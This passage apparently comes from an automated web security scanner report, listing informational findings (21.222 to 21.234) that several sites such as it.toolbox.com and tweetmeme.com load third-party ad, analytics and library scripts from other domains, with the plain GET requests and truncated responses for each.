Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.222. http://home.big.jp/flets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.big.jp
Path:   /flets/

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /flets/ HTTP/1.1
Host: home.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:22 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html; charset=Shift_JIS
Content-Length: 20938

<HTML>
<HEAD>
<Title>.t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... | Amusement BiG-NET http://home.big.jp/flets/</Title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<Meta
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.223. http://howto.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://howto.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:04:18 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0045561790466309
X-Served-In: 0.051589965820312
X-Served-By: h04
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.224. http://investor.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.autobytel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_PREVIEW=;expires=Sun, 24-Jan-2010 22:38:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Overview ><
...[SNIP]...
</iframe>
       
       <script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
        <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</SCRIPT>
       <SCRIPT src="http://an.tacoda.net/an/17295/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

21.225. http://iphone.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iphone.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:55 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0074069499969482
X-Served-In: 0.058972120285034
X-Served-By: h01
Content-Length: 42596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.226. http://it.toolbox.com/blogs/database-soup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1991070620?
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1991070620?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1991070620?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1991070620?">

   </script>
...[SNIP]...

21.227. http://it.toolbox.com/blogs/database-talk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1306366885?
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1306366885?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1306366885?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1306366885?">

   </script>
...[SNIP]...
<br>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...

21.228. http://it.toolbox.com/blogs/db2luw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1835161449?
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1835161449?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
  • http://pmetrics.performancing.com/5970.js

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1835161449?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1835161449?">

   </script>
...[SNIP]...
<br>


<script src="http://pmetrics.performancing.com/5970.js" type="text/javascript"></script>
...[SNIP]...

21.229. http://it.toolbox.com/blogs/db2zos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1832816375?
  • http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=1832816375?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
  • http://twittercounter.com/embed/?username=wfavero&style=bird
  • http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78332
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=1832816375?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1832816375?">

   </script>
...[SNIP]...
<div id="tripit-badge"><script type="text/javascript" src="http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js"></script>
...[SNIP]...
<br>

<script type="text/javascript" language="JavaScript" src="http://twittercounter.com/embed/?username=wfavero&style=bird"></script>
...[SNIP]...

21.230. http://it.toolbox.com/blogs/elsua

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1239133873?
  • http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1239133873?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1239133873?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1239133873?">

   </script>
...[SNIP]...

21.231. http://it.toolbox.com/blogs/juice-analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=966046989?
  • http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=966046989?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61828
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=966046989?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=966046989?">

   </script>
...[SNIP]...

21.232. http://it.toolbox.com/blogs/minimalit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=424581492?
  • http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=424581492?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60086
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=424581492?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=424581492?">

   </script>
...[SNIP]...

21.233. http://it.toolbox.com/blogs/penguinista-databasiensis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2048454184?
  • http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=2048454184?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=2048454184?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">
   
<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&amp;ct=TOOLBOX_ROS&amp;num=5&amp;layt=560x350v1&amp;fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2048454184?">

   </script>
...[SNIP]...

21.234. http://it.toolbox.com/blogs/ppmtoday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1517562571?
  • http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1517562571?
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
  • http://www.google-analytics.com/urchin.js

Request

GET /blogs/ppmtoday HTTP/1.1
